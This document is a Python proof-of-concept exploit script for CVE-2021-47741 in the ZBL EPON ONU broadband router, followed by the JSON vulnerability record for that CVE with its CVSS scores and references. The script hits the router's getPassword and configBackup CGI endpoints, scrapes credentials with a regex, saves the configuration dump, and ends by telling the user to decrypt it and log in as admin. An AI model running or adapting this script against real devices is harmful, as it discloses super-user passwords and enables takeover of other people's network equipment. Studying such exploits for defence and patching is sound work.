CVE-2021-47741

#!/usr/bin/env python3 """ CVE-2021-47741 PoC - ZBL EPON ONU Router Privilege Escalation This script demonstrates the privilege escalation vulnerability in ZBL EPON ONU Broadband Router V100R001 """ import requests import sys import re def exploit_cve_2021_47741(target_ip): """ Exploit the configuration endpoint vulnerability to obtain super user credentials """ base_url = f"http://{target_ip}" print(f"[*] Targeting: {base_url}") print("[*] Attempting to exploit CVE-2021-47741...\n") # Step 1: Try to access the password disclosure endpoint password_endpoint = "/cgi-bin/webui/getPassword" print(f"[*] Trying password endpoint: {password_endpoint}") try: response = requests.get(base_url + password_endpoint, timeout=10) if response.status_code == 200: print(f"[+] Password endpoint accessible!") # Extract password from response password_match = re.search(r'password[=:]\s*["\']?([^"\'<>]+)', response.text, re.I) if password_match: print(f"[+] Found credentials: {password_match.group(0)}") except requests.RequestException as e: print(f"[-] Request failed: {e}") # Step 2: Try to access configuration backup endpoint config_endpoint = "/cgi-bin/webui/configBackup" print(f"\n[*] Trying config backup endpoint: {config_endpoint}") try: response = requests.post(base_url + config_endpoint, timeout=10) if response.status_code == 200: print(f"[+] Config backup accessible!") # Save the config file with open(f"config_backup_{target_ip}.bin", "wb") as f: f.write(response.content) print(f"[+] Config saved to config_backup_{target_ip}.bin") print("[*] Decrypt the config to find super user password") except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Exploitation complete. Use obtained credentials for admin access.") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) exploit_cve_2021_47741(sys.argv[1])

{"cve": {"id": "CVE-2021-47741", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:42.300", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZBL EPON ONU Broadband Router V100R001 contains a privilege escalation vulnerability that allows limited administrative users to elevate access by sending requests to configuration endpoints. Attackers can exploit the vulnerability by accessing the configuration backup or password page to disclose the super user password and gain additional privileged functionalities."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "http://www.zblchina.com", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20211220094023/http://www.wd-thailand.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49737", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zbl-epon-onu-broadband-router-vr-privilege-escalation-via-configuration-endpoint", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php", "source": "[email protected]"}]}}